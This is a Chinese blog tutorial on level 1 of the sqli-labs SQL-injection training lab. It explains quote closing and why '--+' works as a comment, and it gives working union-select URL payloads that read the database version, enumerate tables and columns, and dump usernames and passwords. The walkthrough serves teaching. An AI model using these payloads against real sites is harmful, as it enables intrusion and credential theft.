sql-libs——less1

最新推荐文章于 2022-12-31 20:08:48 发布
最新推荐文章于 2022-12-31 20:08:48 发布
阅读量382 收藏 2
点赞数
分类专栏: sql-libs 文章标签: sql mysql 数据库 sql注入 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lushuaibao/article/details/105920151
版权

目标:获取用户名密码

打开第一关发现没有任何参数,
在这里插入图片描述根据提示“请输入ID作为带有数字值的参数”构造url,正常显示。
在这里插入图片描述加’ 判断有无注入,执行后报错,可判断为数字型注入

在这里插入图片描述使用union查询,查询数据库名及版本

http://192.168.0.5:9002/Less-1/?id=-2' union select 1,version(),database() --+

--+的注释问题

首先明确mysql的注释符号都有哪些
1、#
2、-- 注意--后面有一个空格
3、/*...*/

首先我们查看一下这个源码sql语句为

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

我们的输入为id 带入查询语句的话则是

SELECT * FROM users WHERE id='2'union select 1,2,3' LIMIT 0,1;

可以看到该SQL语句多出一个'所以无法执行成功,因此我们需要通过注释符将其后边的内容进行注释。
1.为什么不使用#
原因是url中#号是用来指导浏览器动作的(例如锚点),对服务器端完全无用。所以,HTTP请求中不包括##号改成url的编码%23就可以了
2.为什么并不使用--而是使用--+
因为带入执行的sql语句 --与后面的这个单引号连接在一起,--后加空格才能起到注释作用,使用--+执行的SQL语句中+变成了空格所以注释符才能起到作用。
当然报错的原因是'没有闭合,只要把单引号闭合语句就可以执行。

这里说一下为什么id的参数要为-1、-2

首先我们查看一下这个源码sql语句为

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

可以看到带入执行的SQL语句为:

$sql="SELECT * FROM users WHERE id='2' union select 1,version(),database() --+' LIMIT 0,1";

union用于合并两个或多个 SELECT 语句所以同时执行的语句为

语句1:SELECT * FROM users WHERE id='2'

语句2:select 1,version(),database()

同时返回语句结果,但是在页面 上只有两个位置所以两个位置只能显示语句1,语句2无法显示;
所以我们需将语句1通过id=-1或者 id=1 and 1=2等方式使其无法获得数据,则页面返回语句2的执行结果
在这里插入图片描述

爆表名
http://192.168.0.5:9002/Less-1/?id=-2' union select 1,group_concat(table_name),3 from%20information_schema.tables where table_schema=database() --+

在这里插入图片描述爆字段
http://192.168.0.5:9002/Less-1/?id=-2' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

在这里插入图片描述
获取表的内容

http://192.168.0.5:9002/Less-1/?id=-2' union select  1,group_concat(username),group_concat(password) from security.users --+

在这里插入图片描述

midsummer_woo
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
e2fsprogs --> e2fsprogs-libs --> extundelete
02-14
安装顺序:e2fsprogs --> e2...tar -xf e2fsprogs-libs-1.41.14.tar.gz cd e2fsprogs-libs-1.41.14 ./configure make && make install cd .. tar -xf extundelete-0.2.4.tar.bz2 cd extundelete-0.2.4 ./configure
krb5-libs-1.15.1-50.el7.x86_64.rpm
07-06
krb5-libs-1.15.1-50.el7.x86_64.rpm
sqli-libs系列
qq_43511094的博客
12-31 1538
sqllibs information_schema中的表实际上是视图,而不是基本表,因此,文件系统上没有与之相关的文件 information_schema库中常用的表 schemate 这个表就很强,可以显示所有数据库的信息,注意,是数据库,不是表,show databases 就是从这个表中获取数据,schema_name就
搭建sql-libs的环境
qq_55777983的博客
04-15 1962
想学sql注入,但是搭建sql-libs不知道如何下手,可以看过来 1.准备工具 phpstudy:https://www.xp.cn sql-libs:https://github.com/Audi-1/sqli-labs 首先得下载好这两样东西,然后才能着手安装 2.想不出名字 安装完phpstudy,下载完sql-libs后,打开phpstudy,启动Apache和mysql 在phpstudy的软件管理中下载php5.x的版本(过高的版本后面安装sql-libs会不兼容,并不是越高越好) 3.解压
SQLLIBS靶场进阶(2)
ppbgi的博客
04-14 659
1—22关链接 二十三 将#、–+进行了处理 其他同上! 二十四 先进行账号的注册: 登录: 修改密码:初始密码123456 ,修改为234567 用修改的密码登录admin2: 二十五 或者 在尝试的时候,发现&&会报错,但是理论上来讲应该可以,所以用了|| 其他同上! ...
sqli_libs通关教程
qq_48904485的博客
03-22 5270
less-1 单引号联合注入 1、判断是字符型还是数字型 Id=2-1 与 id=2 结果相同就是字符型 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xnvwRRTo-1647921807254)(C:\Users\23850\AppData\Roaming\Typora\typora-user-images\image-20211023110308434.png)] [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-bmKZuH51-16479
sqli-labs大详解(完结)
热门推荐
hxhxhxhxx的博客
07-28 5万+
sqlilabs详解(不断更新)题目1-10Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)GET - Error based - Intiger based (基于错误的GET整型注入)Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)Less-4 GET - Error based - Double Quotes
kmod-libs-20-21.el7.x86_64.rar
05-13
标题 "kmod-libs-20-21.el7.x86_64.rar" 提供的是一款与Oracle 19C安装相关的软件包,它包括了 "kmod-20-21.el7.x86_64.rpm" 和 "kmod-libs-20-21.el7.x86_64.rpm" 两个组件。这些组件是针对Red Hat Enterprise ...
keyutils-libs-devel-1.5.8-3.el7.x86_64.rpm下载
08-07
linux系统,rpm资源keyutils-libs-devel-1.5.8-3.el7.x86_64.rpm, 适用于centos系统。
openssl-libs-1.1.1k-1.el8.x86_64.rpm
01-16
官方离线安装包,测试可用。请使用rpm -ivh [rpm完整包名] 进行安装
sql_lib.zip
05-03
Flink SQL Client操作kafka、es、mysql时所需的jar文件,下载后放在flink目录下,在启动Flink SQL Client时通过-l参数指定
mysql-libs.rar
03-20
MySQL5.6.24rpm包centos6.8可用
phpstduy下sql libs下载,安装教程。
qidiandexiaowu
03-02 1609
1.sql libs的下载。 sql libs的源代码地址:https://github.com/Audi-1/sqli-labs ,git进自己phpstduy文件夹的www文件夹内。 2.找到sql libs文件夹内的sql-connections。 找到db-creds.inc文本并打开,把里面的用户名和密码换成自己的,因为里面密码是空着的。 3.sql libs安装。 浏览器里输入ht...
SQL-libs Less-11
AgonYAN的博客
07-14 206
SQL-libs Less-11
SQL-LIBS 41-50通关过程
weixin_51387754的博客
10-20 460
sql-libs是github上的一个专注于sql注入的平台,目前网上关于这个平台的资源很多。
sql-libs游戏笔记(1~7)
qq_45521281的博客
04-14 878
文章目录less-1(GET-Error based-String)less-2(GET-Error based-Intiger based)Less-3(闭合括号,单引号报错)Less-4(闭合括号,双引号报错)Less-5(string 盲注)**利用left(a,b)进行测试:**Less-6(string 盲注)@Less-7(Dump into outfile-用file权限向服务器写...
sqli-libs————Less2(数字型注入)
Fly_鹏程万里
05-08 1173
Less2同样,我们根据提示传入参数id,数据类型为numeric加入单引号进行测试:爆出错误提示信息:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' ...
sqli-libs——less 5(盲注)
Fly_鹏程万里
05-08 1873
Less-5由于这一关涉及到盲注的内容,所以我们还是想来看看源代码吧:可以看到,如果运行返回结果正确的时候只返回you  are in...,不会返回数据库当中的信息了,所以我们不能之前所采用的在less-4之前的方法了。从这里开始就要进行盲注了!利用left(a,b)进行测试测试数据库版本利用left(database(),1)进行尝试http://192.168.11.136/sqli-lab...
sqli-libs攻略入门(1-4)
shijianyoulei6的博客
06-30 2693
从根本上讲,当开发人员对用户的输入过滤不严,造成了用户可以通过输入SQL语句控制数据库,就会产生SQL注入漏洞。 为了省时间,快速的学习了解SQL注入,这里使用Windows sever 2008 R2+phpstudy环境 首先需要在源代码中添加这两个语句,使网页能够回显执行的有效sql语句 echo”有效输入”.$id.”<br>” echo”执行的sql语句”.$sql...
错误:依赖检测失败: mariadb-libsmysql-community-libs-5.7.42-1.el7.x86_64 取代 mariadb-libsmysql-community-libs-compat-5.7.42-1.el7.x86_64 取代
最新发布
05-05
1. 如果你不需要 `mysql-community-libs` 和 `mysql-community-libs-compat`,则可以将它们卸载并重新安装 `mariadb-libs`: ``` sudo yum remove mysql-community-libs mysql-community-libs-compat sudo yum ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

midsummer_woo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值